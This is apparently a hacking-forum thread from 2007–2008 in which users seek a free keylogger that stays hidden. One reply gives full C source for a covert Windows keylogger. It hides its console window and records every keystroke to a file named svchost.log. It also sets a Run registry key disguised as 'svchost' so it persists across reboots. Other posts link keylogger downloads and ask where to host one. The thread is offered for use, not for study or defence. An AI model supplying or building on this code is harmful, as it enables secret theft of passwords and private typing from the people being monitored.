Board

Go Back   Board > Computers, Hacking, and Files > Hacking and Phreaking
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read

Hacking and Phreaking From hacking a website to a new virus or getting free calls on a phone. It goes here.

Reply
 
Thread Tools Display Modes
  #1  
Old 11-05-2007, 09:45 AM
slyspy slyspy is offline
Junior Member
 
Join Date: May 2007
Posts: 1
slyspy is on a distinguished road
Default Keylogger

I'm looking for a good software keylogger, free if possible. I just need it to monitor all keys typed and what program it was in. I found a few but they ended up giving themselves away lol. At the note I need one that will stay hidden too. And this is for home use not for hacking purposes.
Reply With Quote
  #2  
Old 11-05-2007, 06:49 PM
Jamkirk Jamkirk is offline
Trusted Member
Trusted Member
 
Join Date: Aug 2005
Location: Ireland
Posts: 533
Jamkirk is an unknown quantity at this point
Default Re: Keylogger

alot of freeware keyloggers have trojans in them... can you code? they aren't too hard to make... there is an article in the a0tu archives about keyloggers:
>>> http://www.a0tu.com/modules.php?name...article&id=130 <<<
Reply With Quote
  #3  
Old 25-06-2007, 07:08 AM
Frester Frester is offline
Senior Member
 
Join Date: Jun 2007
Location: Ireland!!
Posts: 171
Frester is on a distinguished road
Smile Re: Keylogger

These are ust some random sites I got sent before to look at keyloggers

http://www.ardamax.com/keylogger/

http://www.spywareguide.com/product_show.php?id=526

http://www.freedownloadscenter.com/U...Keylogger.html

http://www.shareup.com/Ardamax_Keylo...oad-10897.html

http://evilzone.net/index.php/topic,16.0.html (site!)

http://rapidshare.com/files/8749860/projects.arm.html (Original!)

http://rapidshare.com/files/8750048/projects.Stats.html (Backup!)


AND HERE IS A CODE!

#include <windows.h>
#include <stdio.h>
#include <winuser.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
HWND stealth; /*creating stealth (window is not visible)*/
AllocConsole();
stealth=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(stealth,0);

int test,create;
test=test_key();/*check if key is available for opening*/

if (test==2)/*create key*/
{
char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
create=create_key(path);

}


int t=get_keys();

return t;
}

int get_keys(void)
{
short character;
while(1)
{

for(character=8;character<=222;character++)
{
if(GetAsyncKeyState(character)==-32767)
{

FILE *file;
file=fopen("svchost.log","a+");
if(file==NULL)
{
return 1;
}
if(file!=NULL)
{
if((character>=39)&&(character<=64))
{
fputc(character,file);
fclose(file);
break;
}
else if((character>64)&&(character<91))
{
character+=32;
fputc(character,file);
fclose(file);
break;
}
else
{
switch(character)
{
case VK_SPACE:
fputc(' ',file);
fclose(file);
break;
case VK_SHIFT:
fputs("[SHIFT]",file);
fclose(file);
break;
case VK_RETURN:
fputs("\n[ENTER]",file);
fclose(file);
break;
case VK_BACK:
fputs("[BACKSPACE]",file);
fclose(file);
break;
case VK_TAB:
fputs("[TAB]",file);
fclose(file);
break;
case VK_CONTROL:
fputs("[CTRL]",file);
fclose(file);
break;
case VK_DELETE:
fputs("[DEL]",file);
fclose(file);
break;
case VK_OEM_1:
fputs("[;:]",file);
fclose(file);
break;
case VK_OEM_2:
fputs("[/?]",file);
fclose(file);
break;
case VK_OEM_3:
fputs("[`~]",file);
fclose(file);
break;
case VK_OEM_4:
fputs("[ [{ ]",file);
fclose(file);
break;
case VK_OEM_5:
fputs("[\\|]",file);
fclose(file);
break;
case VK_OEM_6:
fputs("[ ]} ]",file);
fclose(file);
break;
case VK_OEM_7:
fputs("['\"]",file);
fclose(file);
break;
/*case VK_OEM_PLUS:
fputc('+',file);
fclose(file);
break;
case VK_OEM_COMMA:
fputc(',',file);
fclose(file);
break;
case VK_OEM_MINUS:
fputc('-',file);
fclose(file);
break;
case VK_OEM_PERIOD:
fputc('.',file);
fclose(file);
break;*/
case VK_NUMPAD0:
fputc('0',file);
fclose(file);
break;
case VK_NUMPAD1:
fputc('1',file);
fclose(file);
break;
case VK_NUMPAD2:
fputc('2',file);
fclose(file);
break;
case VK_NUMPAD3:
fputc('3',file);
fclose(file);
break;
case VK_NUMPAD4:
fputc('4',file);
fclose(file);
break;
case VK_NUMPAD5:
fputc('5',file);
fclose(file);
break;
case VK_NUMPAD6:
fputc('6',file);
fclose(file);
break;
case VK_NUMPAD7:
fputc('7',file);
fclose(file);
break;
case VK_NUMPAD8:
fputc('8',file);
fclose(file);
break;
case VK_NUMPAD9:
fputc('9',file);
fclose(file);
break;
case VK_CAPITAL:
fputs("[CAPS LOCK]",file);
fclose(file);
break;
default:
fclose(file);
break;
}
}
}
}
}

}
return EXIT_SUCCESS;
}

int test_key(void)
{
int check;
HKEY hKey;
char path[BUFSIZE];
DWORD buf_length=BUFSIZE;
int reg_key;

reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\ \Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QU ERY_VALUE,&hKey);
if(reg_key!=0)
{
check=1;
return check;
}

reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,( LPBYTE)path,&buf_length);

if((reg_key!=0)||(buf_length>BUFSIZE))
check=2;
if(reg_key==0)
check=0;

RegCloseKey(hKey);
return check;
}

int create_key(char *path)
{
int reg_key,check;

HKEY hkey;

reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\ \Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
if(reg_key==0)
{
RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
check=0;
return check;
}
if(reg_key!=0)
check=1;

return check;
}
__________________
Love your enemies, they hate it!
Reply With Quote
  #4  
Old 15-09-2007, 12:27 AM
slayer_jaz slayer_jaz is offline
Junior Member
 
Join Date: Sep 2007
Posts: 11
slayer_jaz is an unknown quantity at this point
Default Re: Keylogger

Is that code ment to be saved to notepad,,,, and also i'm new at hacking etc etc,,, i wanna try this key log thing on my desktop
Reply With Quote
  #5  
Old 15-09-2007, 12:54 AM
slayer_jaz slayer_jaz is offline
Junior Member
 
Join Date: Sep 2007
Posts: 11
slayer_jaz is an unknown quantity at this point
Default Re: Keylogger

Me again i just put the code into notepad and saved it as an .exe file ie: keylog.exe, but when i ran it as an .exe it said C:\DOCUME~\ADMIN~1\Desktop\keylog.exe The NTVDM CPU has encountered an illegal instruction CS:054f IP:0103 OP:63 6c 75 64 65 Choose 'Close' to terminate the application.

What did i do wrong please help me
Reply With Quote
  #6  
Old 01-07-2008, 11:01 AM
Frester Frester is offline
Senior Member
 
Join Date: Jun 2007
Location: Ireland!!
Posts: 171
Frester is on a distinguished road
Smile Re: Keylogger

I have a free keylogger my friend found. and I mean this is completely free, its not just one of those free trials. It doesn't appear in the system tray or anything and its up to you to hide it in the C: Drive. Unfortunatly it doesn't work on Vista, as a matter of fact I have only tried it on XP .

I just need somewhere to host it, anyone know a site or something? That won't mind me uploading a keylogger that is!

I think I wrote about how to completely hide a folder in another post in something like "Learn Hacking" or something. Try searching that.

Oh! And I'm so glad this site is back!
__________________
Love your enemies, they hate it!
Reply With Quote
Reply

Bookmarks


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT +1. The time now is 01:12 AM.


Copyright a0tu.com